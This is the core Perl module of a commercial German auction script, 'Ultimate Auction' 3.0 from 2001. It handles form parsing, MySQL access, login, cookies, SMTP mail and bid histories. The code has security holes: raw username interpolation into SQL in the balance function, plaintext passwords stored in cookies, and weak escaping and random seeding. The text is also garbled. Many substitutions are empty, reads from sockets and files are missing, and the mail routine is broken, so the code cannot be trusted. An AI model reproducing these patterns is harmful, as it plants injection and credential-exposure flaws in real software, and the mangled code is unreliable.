#!/usr/bin/perl ############################################################################## # Ultimate Auction - Deutsche Ausgabe - Version 3.0 # ############################################################################## # Copyright 2001 thinkfactory - Alle Rechte vorbehalten. # # Copyright 2001 Ultimate Auction Inc. - All rights reserved. # ############################################################################## # Ultimate Auction ist ein käuflich zu erwerbendes Lizenzprodukt. # ############################################################################## # # # Lizenzbedingungen: # # # # - Durch den Kauf und Einsatz der Software erklären Sie sich mit diesen # # Lizenzabkommen einverstanden. # # # # - Diese Lizenz erlaubt es Ihnen, Ultimate Auction auf einem Server und # # einer Website zu benutzen. Für jede installierte Instanz dieses # # Programms benötigen Sie jeweils eine erworbene Lizenz. # # # # - Als legitimierter Benutzer von Ultimate Auction können Sie auf eigenes # # Risiko die Software verändern und/oder auf Ihre Bedürfnisse anpassen. # # Sie können Dritte mit der Anpassung/Veränderung beauftragen. # # # # - Die Original-Software oder die angepasste/veränderte Software und # # Teile derer dürfen nicht weitergegeben oder verkauft oder # # wiederverkauft werden. # # # # - Alle Copyright- und Versions-Hinweise, die in Ultimate Auction oder # # deren HTML-Seiten verwendet, erstellt und/oder gezeigt werden, # # dürfen nicht entfernt werden. Die Copyright- und Versions-Hinweise # # sowie je nach Version der Zusatz "powered by Ultimate Auction" müssen # # für Benutzer sichtbar und in ungeänderter Form dargestellt werden. # # # # - Dieses Lizenzabkommen beruht auf der aktuellen internationalen # # Gesetzeslage. # # # # - Bei einem Verstoß gegen diesen Lizenzvertrag kann durch die Firma # # Ultimate Auction, Inc. oder deren Beauftragten die erworbene Lizenz # # jederzeit zurückgezogen und für nichtig erklärt werden, es werden # # keinerlei geleisteten Zahlungen für erworbene Lizenzen erstattet. # # # # - Ultimate Auction und die dazugehörenden Dateien werden ohne # # Funktionsgarantie für die im Umfeld verwendete Hardware oder # # Software verkauft. # # # # - Ultimate Auction Inc. oder deren Beauftragten sind in keiner Form # # für Inhalte oder Verfasser verantwortlich, die durch diese # # Software erstellt wurden. # # # # - Das Risiko der Benutzung von Ultimate Auction obliegt dem # # Lizenznehmer, jegliche Erstattungen im Rechtsfall erstrecken sich # # maximal auf den Kaufpreis der Lizenz. # # # # Weitere Informationen finden Sie unter http://www.ultimate-auction.de # # # ############################################################################## # # # Wir wünschen viel Spaß mit Ultimate Auction! # # # ############################################################################## package UltimateAuction; # Package the Perl Module ####################################################################### # Export the variables from the module # ####################################################################### require Exporter; @ISA = qw (Exporter); @EXPORT = qw(@EXPORT_OK); @EXPORT_OK = qw(%form $couser $copass $db $dbh %config @auction_types); ####################################################################### ###################################################################### # Initiate Our Modules # ###################################################################### use DBI; use IO::Socket; use vars qw(%form $couser $copass $db $dbh %config @auction_types); use strict; ###################################################################### require "variables/variables.cgi"; require "variables/mainvariables.cgi"; my $statusConnectionError; ################################################# # Parse Form Data # ################################################# sub fetch_form { my $temp; my $buffer; my @data; read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'}); foreach $temp (split(/&|=/,$buffer)) { $temp =~ tr/+/ /; $temp =~ s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge; $temp =~ s/[\r\n]/ /g; push @data, $temp; } foreach $temp (split(/&|=/,$ENV{'QUERY_STRING'})) { $temp =~ tr/+/ /; $temp =~ s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge; $temp =~ s/[\r\n]/ /g; push @data, $temp; } return @data; } ################################################# # Parse Form Data for mailinglist # ################################################# sub fetch_form2 { my $temp; my $buffer; my @data; read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'}); foreach $temp (split(/&|=/,$buffer)) { $temp =~ tr/+/ /; $temp =~ s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge; $temp =~ s/[\r\n]/\n/g; push @data, $temp; } foreach $temp (split(/&|=/,$ENV{'QUERY_STRING'})) { $temp =~ tr/+/ /; $temp =~ s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge; $temp =~ s/[\r\n]/ /g; push @data, $temp; } return @data; } ################################################# # Database Functions # ################################################# sub sql_encode { my $toencode = $_[0]; $toencode =~ s/\\/\\\\/g; $toencode =~ s/\'/\\\'/g; $toencode =~ s/"/\"/g; return $toencode; } sub url_encode { my $input = shift; $input =~s/([^a-zA-Z0-9_.-])/uc sprintf("%%%02x",ord($1))/eg; return $input } sub dollar_encode { my $toencode = shift; my @dolamt; $toencode =~ s/\,//g; @dolamt = split(/\./, $toencode); $dolamt[0] = "0" if (!($dolamt[0])); $dolamt[0] = int($dolamt[0]); $dolamt[1] = substr($dolamt[1], 0, 2); $dolamt[1] = "00" if (length($dolamt[1]) == 0); $dolamt[1] = "$dolamt[1]0" if (length($dolamt[1]) == 1); return "$dolamt[0].$dolamt[1]"; } sub format_price { $_[0] =~ s/\,//g; my $htmlon = $_[1]; my @amt = split(/\./, $_[0]); $amt[0] = "0" if (!($amt[0])); $amt[1] = substr($amt[1], 0, 2); $amt[1] = "00" if (length($amt[1]) == 0); $amt[1] = "$amt[1]0" if (length($amt[1]) == 1); if (($_[0] < 0) && ($htmlon)) { return "$config{'currency'} $amt[0].$amt[1]"; } elsif (($_[0] > 0) && ($htmlon)) { return "$config{'currency'} $amt[0].$amt[1]"; } else { return "$config{'currency'} $amt[0].$amt[1]"; } } sub format_price_clean { $_[0] =~ s/\,//g; my $htmlon = $_[1]; my @amt = split(/\./, $_[0]); $amt[0] = "0" if (!($amt[0])); $amt[1] = substr($amt[1], 0, 2); $amt[1] = "00" if (length($amt[1]) == 0); $amt[1] = "$amt[1]0" if (length($amt[1]) == 1); if (($_[0] < 0) && ($htmlon)) { return "$config{'currency'} $amt[0].$amt[1]"; } elsif (($_[0] > 0) && ($htmlon)) { return "$config{'currency'} $amt[0].$amt[1]"; } else { return "$config{'currency'} $amt[0].$amt[1]"; } } ################################################# # Connect to the database # ################################################# sub mysql_connect { my $db = DBI -> connect("DBI:mysql:$config{'connectstring'}:$config{'dbserver'}", "$config{'dbusername'}", "$config{'dbpassword'}") || &statusConnectionError; if ($db && $statusConnectionError != 1) { return $db; } else { my $alarmmailto; my $current_time = time + ($config{'timediff'} * 3600); my $alarm_time = UltimateAuction::display_time1($current_time); $alarmmailto = "Hallo Administrator,\n\ndie MySQL-Datenbank war am $alarm_time nicht verfügbar.\n\nGrund: $DBI::errstr\n\n"; &UltimateAuction::sendemail($config{'admin_address'},$config{'admin_address'},"ACHTUNG: Datenbank nicht verfügbar",$alarmmailto); &UltimateAuction::error("Zur Zeit ist keine Verbindung zur MySQL-Datenbank möglich - bitte versuchen Sie es später nocheinmal"); } } sub statusConnectionError { $statusConnectionError = 1; } ################################################# # Disconnect from the database # ################################################# sub mysql_disconnect { if ($dbh) { $dbh -> finish; } defined $_[0] and ($_[0]->disconnect or die "Keine Verbindung zur MySQL-Datenbank möglich - Grund: $DBI::errstr" and undef $_[0]); } ################################################# # Displays Time Reamining for Auctions # ################################################# sub time_remain($){ my $diff = $_[0] - time; if($diff < 0){ return "Auktion beendet" } my $days = int ( $diff / 86400); my $hours = int (($diff - $days * 86400) / 3600 ); my $mins = int (($diff - $days * 86400 - $hours * 3600) / 60 ); if($days > 1){ return "$days Tage $hours Std.+"; }elsif($days == 1){ return "1 Tag $hours Std.+"; }elsif($hours > 12){ return "$hours Std. $mins Min+"; }elsif($hours > 0){ return "$hours Std. $mins Min+"; }else{ my $secs = int ($diff-($days*86400)-($hours*3600)-($mins*60)); return "$mins Min $secs Sek+"; } } ################################################# # Get Cookie From Computer # ################################################# sub get_cookie { my @cstuff = @_; my ($cookie, $value, $char, %cookie); my @Cdec = ('\+', '\%3A\%3A', '\%3D', '\%2C', '\%25', '\%2B', '\%26','\%3B'); my %Cdec = ('\+',' ','\%3A\%3A','::','\%3D','=','\%2C',',','\%25','%','\%2B','+','\%26','&','\%3B',';'); if ($ENV{'HTTP_COOKIE'}) { foreach (split(/; /,$ENV{'HTTP_COOKIE'})) { ($cookie,$value) = split(/=/); foreach $char (@Cdec) { $cookie =~ s/$char/$Cdec{$char}/g; $value =~ s/$char/$Cdec{$char}/g; } $cookie{$cookie} = $value; } } return %cookie; } ################################################# # Send A Cookie to a Computer # ################################################# sub set_cookie { my @cookie = @_; my ($cookie, $value, $type, $char); my @Cenc = ('\;','\&','\+','\%','\,','\=','\:\:','\s'); my %Cenc = ('\;','%3B','\&','%26','\+','%2B','\%','%25','\,','%2C','\=','%3D','\:\:','%3A%3A','\s','+'); my $header = ''; for (my $i = 0; $i <= $#cookie; $i = $i + 3) { ($cookie, $value, $type) = @cookie[$i .. $i+2]; foreach $char (@Cenc) { $cookie =~ s/$char/$Cenc{$char}/g; $value =~ s/$char/$Cenc{$char}/g; } $header = 'Set-Cookie: ' . $cookie . '=' . $value . ';'; if ($type == 1) { $header .= ' expires=' . $config{'cexp'} . ';' } print "$header\n"; } } ################################################# # Breaks the listings up into multiple pages # ################################################# sub pagebreak{ local %form = &UltimateAuction::fetch_form; my $content; my $begin = "
Blättern:"; my $next = "weiter"; my $nonext = "Ende"; my $previous = " zurück"; my $noprevious = " Anfang"; my $end = "
"; my $urlfragment; foreach(keys %form){ next if($_ eq 'pb' || $_ eq 'page'); my $f = $form{$_}; $f=~s/(\W)/'%'.unpack("H2", $1)/eg; $urlfragment.='&' if $urlfragment; $urlfragment.="$_=$f"; } my($pcount, $pagebreak) = @_; $content = $begin; if($form{page} > 0){ $content .= " [$noprevious] "; $content .= " [$previous] "; } #$content .= "|"; #for(0..$form{page}-1) { # $content .= " @{[$_+1]} " #} #$content .= " ", int($form{page})+1, " "; #for($form{page}+1..$pcount) { # $content .=" @{[$_+1]} " #} #if($pcount>0) { # $content .= " Alle " #} if($form{page} < $pcount) { $content .= " [$next] " } $content .= $end; return $content; } ################################################# # Send out system emails # ################################################# sub sendemail { my ($to,$from,$subject,$message) = @_; if ($config{'mailmethod'} eq 0) { open MAIL, "|$config{'mailprog'}"; print MAIL "To: $to\nFrom: $from\nSubject: $subject\n\n$message\n\n"; close MAIL; } if ($config{'mailmethod'} eq 1) { my $remotehost; my $port; my $proto; my $port; my $error_title = "Fehler: "; my $FromName; my $mailserver = $config{'smtp'}; my $test; my @fm; my $fm; my @f; my $l; $remotehost = $config{'smtp'}; $proto = getprotobyname('tcp'); $port=25; $test = $from; $test =~ s///d; $FromName = $f[0]; $from = $f[1]; } else { $FromName = ''; } socket(S, AF_INET, SOCK_STREAM, $proto) || Error($error_title,"error 1\n"); my $sin = sockaddr_in( $port, inet_aton( $remotehost )); connect(S, $sin) || Error($error_title,"error 3\n"); select(S); $| = 1; select(STDOUT); $l = ; if (substr($l,0,3) ne "220") {Error($error_title,"Connect: $l");} print S "helo $mailserver\r\n"; $l = ; if (substr($l,0,3) ne "250") {Error($error_title,"helo: $l");} print S "mail from: $from\r\n"; $l = ; if (substr($l,0,3) ne "250") {Error($error_title,"mail: $l");} print S "rcpt to: $to\r\n"; $l = ; if (substr($l,0,3) ne "250") {Error($error_title,"rcpt: $l");} print S "data\r\n"; $l = ; if (substr($l,0,3) ne "354") {Error($error_title,"data begin: $l");} print S "Subject: $subject\r\n"; print S "From: $FromName <$from>\r\n"; print S "To: $to\r\n"; print S "Content-type: text\/plain\r\n"; print S "\r\n"; print S "$message\r\n"; print S "\r\n.\r\n"; $l = ; if (substr($l,0,3) ne "250") {Error($error_title,"data end: $l");} print S "quit\r\n"; $l = ; if (substr($l,0,3) ne "221") {Error($error_title,"quit: $l");} close(S); } } ################################################# # Display Error Message and Stop the Process # ################################################# sub error { my $header = &UltimateAuction::header; # Fetch the header &UltimateAuction::Display($header); # Display the Header my $error = shift; my $content=UltimateAuction::Open_Template("error.txt"); $content=~ s//$error/g; &UltimateAuction::Display($content); # Display the Page Contents my $footer = &UltimateAuction::footer; # Fetch the footer &UltimateAuction::Display($footer); # Display the Footer #print STDERR "$error\n"; if ($db) { # disconnect from our database &UltimateAuction::mysql_disconnect($db); } exit(0); } ################################################# # Display Error Message and Stop the Process # ################################################# sub service { if ($config{'service'} eq 1) { my $header = &UltimateAuction::header; # Fetch the header &UltimateAuction::Display($header); # Display the Header my $content=UltimateAuction::Open_Template("service.txt"); &UltimateAuction::Display($content); # Display the Page Contents my $footer = &UltimateAuction::footer; # Fetch the footer &UltimateAuction::Display($footer); # Display the Footer if ($db) { &UltimateAuction::mysql_disconnect($db); } exit(0); } } ################################################# # Convert the time to a readable format # ################################################# sub display_time1 { my $time = shift; $time = localtime($time); if($config{'timeformat'} eq "short") { my @tarray = split(/ +/,$time); my %months = ( "Jan" => 1, "Feb" => 2, "Mar" => 3, "Apr" => 4, "May" => 5, "Jun" => 6, "Jul" => 7, "Aug" => 8, "Sep" => 9, "Oct" => 10, "Nov" => 11, "Dec" => 12 ); my $year = substr($tarray[4],2,2); my ($hour,$min,$sec) = split(/:/,$tarray[3]); my $AMPM; if ($hour >= 12) { $AMPM = "PM"; if ($hour > 12) { $hour = $hour; } } else { $AMPM = "AM"; } if ($tarray[2] < 10) { $tarray[2]="0".$tarray[2]; } if ($months{$tarray[1]} < 10) { $months{$tarray[1]}="0".$months{$tarray[1]}; } $time = "$tarray[2].$months{$tarray[1]}.20$year um $hour:$min Uhr"; } return $time; } ################################################# # Convert the time to a readable format # ################################################# sub display_time2 { my $time = shift; $time = localtime($time); my @tarray = split(/ +/,$time); my %months = ( "Jan" => "Januar", "Feb" => "Februar", "Mar" => "März", "Apr" => "April", "May" => "Mai", "Jun" => "Juni", "Jul" => "Juli", "Aug" => "August", "Sep" => "September", "Oct" => "Oktober", "Nov" => "November", "Dec" => "Dezember" ); my $year = substr($tarray[4],2,2); my ($hour,$min,$sec) = split(/:/,$tarray[3]); my $AMPM; if ($hour >= 12) { $AMPM = "PM"; if ($hour > 12) { $hour = $hour; } } else { $AMPM = "AM"; } if ($tarray[2] < 10) { $tarray[2]="0".$tarray[2]; } $time = "$tarray[2]. $months{$tarray[1]} 20$year um $hour:$min Uhr ($config{'timezone'})"; return $time; } ################################################# # Short-Date # ################################################# sub display_time3 { my $time = shift; $time = localtime($time); if($config{'timeformat'} eq "short") { my @tarray = split(/ +/,$time); my %months = ( "Jan" => 1, "Feb" => 2, "Mar" => 3, "Apr" => 4, "May" => 5, "Jun" => 6, "Jul" => 7, "Aug" => 8, "Sep" => 9, "Oct" => 10, "Nov" => 11, "Dec" => 12 ); my $year = substr($tarray[4],2,2); my ($hour,$min,$sec) = split(/:/,$tarray[3]); my $AMPM; if ($hour >= 12) { $AMPM = "PM"; if ($hour > 12) { $hour = $hour; } } else { $AMPM = "AM"; } if ($tarray[2] < 10) { $tarray[2]="0".$tarray[2]; } if ($months{$tarray[1]} < 10) { $months{$tarray[1]}="0".$months{$tarray[1]}; } $time = "$tarray[2].$months{$tarray[1]}.20$year"; } return $time; } ################################################# # Convert the time to a readable format # ################################################# sub display_time4 { my $time = shift; $time = localtime($time); if($config{'timeformat'} eq "short") { my @tarray = split(/ +/,$time); my %months = ( "Jan" => 1, "Feb" => 2, "Mar" => 3, "Apr" => 4, "May" => 5, "Jun" => 6, "Jul" => 7, "Aug" => 8, "Sep" => 9, "Oct" => 10, "Nov" => 11, "Dec" => 12 ); my $year = substr($tarray[4],2,2); my ($hour,$min,$sec) = split(/:/,$tarray[3]); my $AMPM; if ($hour >= 12) { $AMPM = "PM"; if ($hour > 12) { $hour = $hour; } } else { $AMPM = "AM"; } if ($tarray[2] < 10) { $tarray[2]="0".$tarray[2]; } if ($months{$tarray[1]} < 10) { $months{$tarray[1]}="0".$months{$tarray[1]}; } $time = "$tarray[2].$months{$tarray[1]}.20$year - $hour:$min h"; } return $time; } sub display_time5 { my $time = shift; $time = localtime($time); if($config{'timeformat'} eq "short") { my @tarray = split(/ +/,$time); my %months = ( "Jan" => 1, "Feb" => 2, "Mar" => 3, "Apr" => 4, "May" => 5, "Jun" => 6, "Jul" => 7, "Aug" => 8, "Sep" => 9, "Oct" => 10, "Nov" => 11, "Dec" => 12 ); my $year = substr($tarray[4],2,2); my ($hour,$min,$sec) = split(/:/,$tarray[3]); my $AMPM; if ($hour >= 12) { $AMPM = "PM"; if ($hour > 12) { $hour = $hour; } } else { $AMPM = "AM"; } if ($tarray[2] < 10) { $tarray[2]="0".$tarray[2]; } if ($months{$tarray[1]} < 10) { $months{$tarray[1]}="0".$months{$tarray[1]}; } $time = "20$year$months{$tarray[1]}$tarray[2]"; } return $time; } ################################################# # Authentication System # ################################################# sub authenticate { my ($waistuser,$waistpass,$require,$nocrypt,$db) = @_; my $username; my $password; my $usedcookie; my $status; my $suspend; my $ifpass; my $bad; my %cookie = &get_cookie(); my $couser = $cookie{'Username'}; my $copass = $cookie{'Password'}; my ($usernum, $dbuser, $dbpass); if ($couser && $copass) { $nocrypt=0; if ($require) { $password = $waistpass; } else { $password = $copass; } $username = $couser; $usedcookie = 1; } else { $username = $waistuser; $password = $waistpass; $usedcookie = 0; } if (!$username && !$password) { return 0,0,0; } $dbh=$db->prepare("SELECT usernum,username,password,status,status2 FROM Members WHERE LOWER(username) = LOWER('" . sql_encode($username) . "')"); $dbh->execute(); if (($usernum,$dbuser,$dbpass,$status,$suspend) = $dbh->fetchrow_array()) { if ($nocrypt) { $ifpass = $password; } else { $ifpass = crypt($password,$dbpass); } if (lc($ifpass) ne lc($dbpass)) { $bad = "password"; } } else { $bad = "username"; } if (!$status) { $bad = "status" unless $bad; } if (!$suspend) { $bad = "suspend" unless $bad; } if ($bad) { if ($usedcookie) { UltimateAuction::set_cookie("Username","",0,"Password","",0); } if ($bad eq 'username') { error("Der Benutzername \"$username\" existiert nicht."); } elsif ($bad eq 'password') { error("Das Kennwort ist ungültig."); } elsif ($bad eq 'status') { error("Ihr Konto wurde noch nicht aktiviert. Wenn Sie sich bereits registriert haben, dann sollten Sie eine Bestätigungsmail mit einem Aktivierungslink erhalten haben. Die geschieht zur Überprüfung der korrekten E-Mail-Adresse."); } elsif ($bad eq 'suspend') { error("Ihr Konto ist gesperrt worden. Bei Fragen wenden Sie sich bitte an die Administration."); } } if (!$usedcookie) { UltimateAuction::set_cookie('Username',"$username",1,'Password',"$password",1); } return "$usernum","$dbuser","$dbpass"; } ################################################# # Find a user's rating # ################################################# sub addup_rating { my $usernum = shift; my $db = shift; my ($rating)=$db->selectrow_array("SELECT SUM(rating) from Feedback WHERE ratee=" . int($usernum)); my ($username)=$db->selectrow_array("SELECT username from Members WHERE usernum=" . int($usernum)); my ($userjoin)=$db->selectrow_array("SELECT joindate from Members WHERE usernum=" . int($usernum)); my ($idmember)=$db->selectrow_array("SELECT idmember from Members WHERE usernum=" . int($usernum)); my $rsymbol; my $joinsymbol; my $idsymbol; my $current_time = time + ($config{'timediff'} * 3600); if ($current_time < (30 * 86400 + $userjoin)) { $joinsymbol=" /help.pl?template=newmember target='_blank'>"; $joinsymbol.="$config{'joinsymbol'}"; $joinsymbol.=" "; } if ($idmember eq '1') { $idsymbol = $config{'idmember'}; } else { $idsymbol = ""; } if ($rating) { $rsymbol = " /help.pl?template=stars target='_blank'>"; if ($rating >= $config{'rsymbol1'} and $rating < $config{'rsymbol2'}) { $rsymbol .= "$config{'rsymbolimg1'}"; } if ($rating >= $config{'rsymbol2'} and $rating < $config{'rsymbol3'}) { $rsymbol .= "$config{'rsymbolimg2'}"; } if ($rating >= $config{'rsymbol3'} and $rating < $config{'rsymbol4'}) { $rsymbol .= "$config{'rsymbolimg3'}"; } if ($rating >= $config{'rsymbol4'} and $rating < $config{'rsymbol5'}) { $rsymbol .= "$config{'rsymbolimg4'}"; } if ($rating >= $config{'rsymbol5'} and $rating < $config{'rsymbol6'}) { $rsymbol .= "$config{'rsymbolimg5'}"; } if ($rating >= $config{'rsymbol6'} and $rating < $config{'rsymbol7'}) { $rsymbol .= "$config{'rsymbolimg6'}"; } if ($rating >= $config{'rsymbol7'} and $rating < $config{'rsymbol8'}) { $rsymbol .= "$config{'rsymbolimg7'}"; } if ($rating >= $config{'rsymbol8'} and $rating < $config{'rsymbol9'}) { $rsymbol .= "$config{'rsymbolimg8'}"; } if ($rating >= $config{'rsymbol9'} and $rating < $config{'rsymbol10'}) { $rsymbol .= "$config{'rsymbolimg9'}"; } if ($rating >= $config{'rsymbol10'}) { $rsymbol .= "$config{'rsymbolimg10'}"; } $rsymbol .=" "; $rating="(/feedback.pl?usernum=$usernum&username=$username>$rating) $rsymbol $idsymbol $joinsymbol"; return $rating; } else { return "(0) $idsymbol $joinsymbol"; } } ################################################# # Charge/Credit User's Accounts # ################################################# sub modify_balance_general { my $type; my $balance; my $newam; my $current_time; my $twonewam; $current_time = time + ($config{'timediff'} * 3600); my ($user,$amount,$reason,$method,$db) = @_; $dbh=$db->prepare("SELECT balance FROM Members WHERE username='$user'"); $dbh->execute(); ($balance) = $dbh->fetchrow_array(); if ($method eq 'Gebühr') { $newam = $balance + (-$amount); $type = "Gebühr"; } elsif ($method eq 'Gutschrift') { $newam = $balance + $amount; $type = "Gutschrift"; } $db->do("INSERT INTO accounting (acUser,acDate,acCharge,acReason,acType) VALUES ('" . UltimateAuction::sql_encode($user) . "',$current_time,$amount,'" . UltimateAuction::sql_encode($reason) . "','" . UltimateAuction::sql_encode($type) . "')"); $db->do("UPDATE Members SET balance='$newam' WHERE username='$user'"); } ################################################# # Authentication Form # ################################################# sub auth_form { local %form = &UltimateAuction::fetch_form; my ($couser,$feature) = @_; my $key; my $header = &UltimateAuction::header; # Fetch the header &UltimateAuction::Display($header); # Display the Header my $hidden; foreach $key(keys %form) { $hidden .= "\n" if ($key ne 'username' and $key ne 'password'); } $hidden .= ""; my $content=UltimateAuction::Open_Template("authform.txt"); $content=~ s//$hidden/g; $content=~ s//$feature/g; $content=~ s//$couser/g; $content=~ s//$ENV{'SCRIPT_NAME'}/g; &UltimateAuction::Display($content); # Display the Page Contents my $footer = &UltimateAuction::footer; # Fetch the Footer &UltimateAuction::Display($footer); # Display the Footer } ################################################# # Random password generator # ################################################# sub generate_pass { my @passset; my $randum_num; my $randpass; srand(time ^ $$); @passset = ('a'..'k', 'm'..'n', 'p'..'z', '2'..'9'); $randpass = ""; for (my $i = 0; $i < 8; $i++) { $randum_num = int(rand($#passset + 1)); $randpass .= $passset[$randum_num]; } return $randpass; } ################################################# # Find the lowest winning bid # ################################################# sub get_high_bid { my $itemnum = shift; my $sellingqty = shift; my $db = shift; my $price; my $quantity; my $lessflag; my $lowestwinningbid=0; my $counter=0; $dbh=$db->prepare("SELECT bidprice,bidquantity,bidonless FROM Bids WHERE biditem=" . int($itemnum) . " ORDER BY bidprice DESC,bidquantity DESC,bidtime"); $dbh->execute(); while (($price,$quantity,$lessflag) = $dbh->fetchrow_array()) { $counter += $quantity; if (($counter > $sellingqty) and !($lessflag)) { $counter -= $quantity; next; } else { $lowestwinningbid = $price; } return $lowestwinningbid if $counter >= $sellingqty; } if ($lowestwinningbid) { return $lowestwinningbid; } else { $dbh=$db->prepare("SELECT start FROM Items WHERE itemnum=" . int($itemnum)); $dbh->execute(); ($price) = $dbh->fetchrow_array(); return $price; } } ################################################# # Find the lowest new bid. # ################################################# sub get_lowest_bid { my ($itemnum,$db) = @_; my $price; my $quantity; my $increment; my $sellingqty; my $lessflag; my $counter=0; $dbh=$db->prepare("SELECT quantity,increment FROM Items WHERE itemnum=" . int($itemnum)); $dbh->execute(); ($sellingqty,$increment) = $dbh->fetchrow_array(); $dbh=$db->prepare("SELECT bidprice,bidquantity,bidonless FROM Bids WHERE biditem=" . int($itemnum) . " ORDER BY bidprice DESC,bidquantity DESC,bidtime"); $dbh->execute(); while (($price,$quantity,$lessflag) = $dbh->fetchrow_array()) { $counter += $quantity; if (($counter > $sellingqty) and !($lessflag)) { $counter -= $quantity; next; } if ($counter >= $sellingqty) { $price = dollar_encode($price+$increment) if ($quantity == $sellingqty); return ($price,$increment,$sellingqty); } } $dbh=$db->prepare("SELECT start FROM Items WHERE itemnum=" . int($itemnum)); $dbh->execute(); ($price) = $dbh->fetchrow_array(); return ($price,$increment,$sellingqty); } ################################################# # Display the Dutch Bidding History # ################################################# sub get_dutch_bidhis { my $itemnum = shift; my $sellingqty = shift; my $reserve = shift; my $db = shift; my $closef=shift; my $bid_history; my $price; my $quantity; my $bidder; my $biddernum; my $time; my $lessflag; my $counter=0; my $color = "body1"; $bid_history .= "BieterPreisMengeGebotszeit"; $dbh=$db->prepare("SELECT username,bidprice,bidquantity,bidtime,bidonless,usernum FROM Members,Bids WHERE biditem=" . int($itemnum) . " AND usernum = bidder ORDER BY bidprice DESC,bidquantity DESC,bidtime"); $dbh->execute(); while (($bidder,$price,$quantity,$time,$lessflag, $biddernum) = $dbh->fetchrow_array()) { $counter += $quantity; if ($counter > $sellingqty) { if ($lessflag) { $quantity = $quantity-($counter-$sellingqty) . " von $quantity"; } else { $counter -= $quantity; next; } } if ($config{'showbids'} eq "0") { if ($closef eq "0") { $bid_history .= "$bidderAnzeige erfolgt nach Auktionsende "; } else { $bid_history .= "$bidder$config{'currency'} $price "; } } else { $bid_history .= "$bidder$config{'currency'} $price "; } $bid_history .= "(Mindestpreis noch nicht erreicht)" if $price < $reserve; $bid_history .= "$quantity". UltimateAuction::display_time1($time).""; if ($color eq "body1") { $color = "body2"; } else { $color = "body1"; } last if $counter >= $sellingqty; } $bid_history .= "Bisher keine Gebote..." unless $counter; return $bid_history; } ################################################# # Display the Regular Bidding History # ################################################# sub get_regular_bidhis { my $itemnum = shift; my $sellingqty = shift; my $reserve = shift; my $db = shift; my $closef=shift; my $bid_history; my $price; my $quantity; my $bidder; my $biddernum; my $time; my $lessflag; my $counter=0; my $color = "body1"; $bid_history .= "BieterGebotGebotszeit"; my $dbh=$db->prepare("SELECT username,bidprice,bidtime,usernum FROM Members,Bids WHERE biditem=" . int($itemnum) . " AND usernum = bidder ORDER BY bidprice DESC,bidtime"); $dbh->execute(); while (($bidder,$price,$time,$biddernum) = $dbh->fetchrow_array()) { $counter++; if ($config{'showbids'} eq "0") { if ($closef eq "0") { $bid_history .= "$bidderAnzeige erfolgt nach Auktionsende "; } else { $bid_history .= "$bidder$config{'currency'} $price "; } } else { $bid_history .= "$bidder$config{'currency'} $price "; } $bid_history .= "(Mindestpreis noch nicht erreicht)" if $price < $reserve; $bid_history .= "".UltimateAuction::display_time1($time).""; if ($color eq "body1") { $color = "body2"; } else { $color = "body1"; } } $bid_history .= "Es liegen keine Gebote vor ..." unless $counter; return $bid_history; } ############################################## # Sub: move_the_file(file1, file2) # This moves a file. sub move_the_file { my $line; my @lines; my ($firstfile, $secondfile) = @_; return 0 unless open(FIRSTFILE,$firstfile); @lines=; close FIRSTFILE; return 0 unless open(SECONDFILE,">$secondfile"); foreach $line (@lines) { print SECONDFILE $line; } close SECONDFILE; return 0 unless unlink($firstfile); return 1; } sub header { local %form = &UltimateAuction::fetch_form; my %cookie = &UltimateAuction::get_cookie(); my $couser = $cookie{'Username'}; my $copass = $cookie{'Password'}; my $startlink; my $cafelink; if ($config{'mainview_type'} eq 0) { $startlink = "$config{'static_url'}/main.html"; } else { $startlink = "$config{'script_dir'}/main.pl"; } if (-e "cafe.pl") { $cafelink = " | /cafe.pl>Cafe"; } else { $cafelink = ''; } my $head = "Content-type: text/html\n\n"; $head .=&Open_Template("header.txt"); my $user; my $inorout; my $accountmenu; if ($couser && $form{'logout'} ne 'true') { $user = $couser; $inorout = "LOGOUT"; $accountmenu = &accountmenu; } else { $user = "Gast"; $inorout = "LOGIN"; } my $current_time = time + ($config{'timediff'} * 3600); $current_time = display_time2($current_time); $head=~ s//$config{'auction_title'}/g; $head=~ s//$config{'hoverlinkcolor'}/g; $head=~ s//$config{'fontsize'}/g; $head=~ s//$config{'font'}/g; $head=~ s//$config{'background'}/g; $head=~ s//$config{'bgcolortwo'}/g; $head=~ s//$config{'textcolor'}/g; $head=~ s//$config{'linkcolor'}/g; $head=~ s//$config{'alinkcolor'}/g; $head=~ s//$config{'vlinkcolor'}/g; $head=~ s//$inorout/g; $head=~ s//$current_time/g; $head=~ s//$accountmenu/g; $head=~ s//$startlink/g; $head=~ s//$cafelink/g; return $head; } sub static_header { local %form = &UltimateAuction::fetch_form; my %cookie = &UltimateAuction::get_cookie(); my $couser = $cookie{'Username'}; my $copass = $cookie{'Password'}; my $head = ""; $head .=&Open_Template("header_static.txt"); my $user; my $inorout; my $accountmenu; if ($couser && $form{'logout'} ne 'true') { $user = "Gast"; $inorout = "LOGIN"; $accountmenu = &accountmenu; } my $current_time = time + ($config{'timediff'} * 3600); $current_time = display_time2($current_time); my $startlink; if ($config{'mainview_type'} eq 0) { $startlink = "$config{'static_url'}/main.html"; } else { $startlink = "$config{'script_dir'}/main.pl"; } $head=~ s//$config{'auction_title'}/g; $head=~ s//$config{'hoverlinkcolor'}/g; $head=~ s//$config{'fontsize'}/g; $head=~ s//$config{'font'}/g; $head=~ s//$config{'background'}/g; $head=~ s//$config{'bgcolortwo'}/g; $head=~ s//$config{'textcolor'}/g; $head=~ s//$config{'linkcolor'}/g; $head=~ s//$config{'alinkcolor'}/g; $head=~ s//$config{'vlinkcolor'}/g; $head=~ s//$inorout/g; $head=~ s//$current_time/g; $head=~ s//$accountmenu/g; $head=~ s//$startlink/g; return $head; } sub footer { my $foot=&Open_Template("footer.txt"); my $message; my %cookie = &UltimateAuction::get_cookie(); my $couser = $cookie{'Username'}; my $copass = $cookie{'Password'}; if ($couser && $form{'logout'} ne 'true') { $message = "Sie sind angemeldet."; } else { $message = "Sie sind nicht angemeldet."; } $foot=~ s//$message/; $foot=~ s//$config{'cp_years'}/; $foot=$foot."

Powered by Ultimate Auction
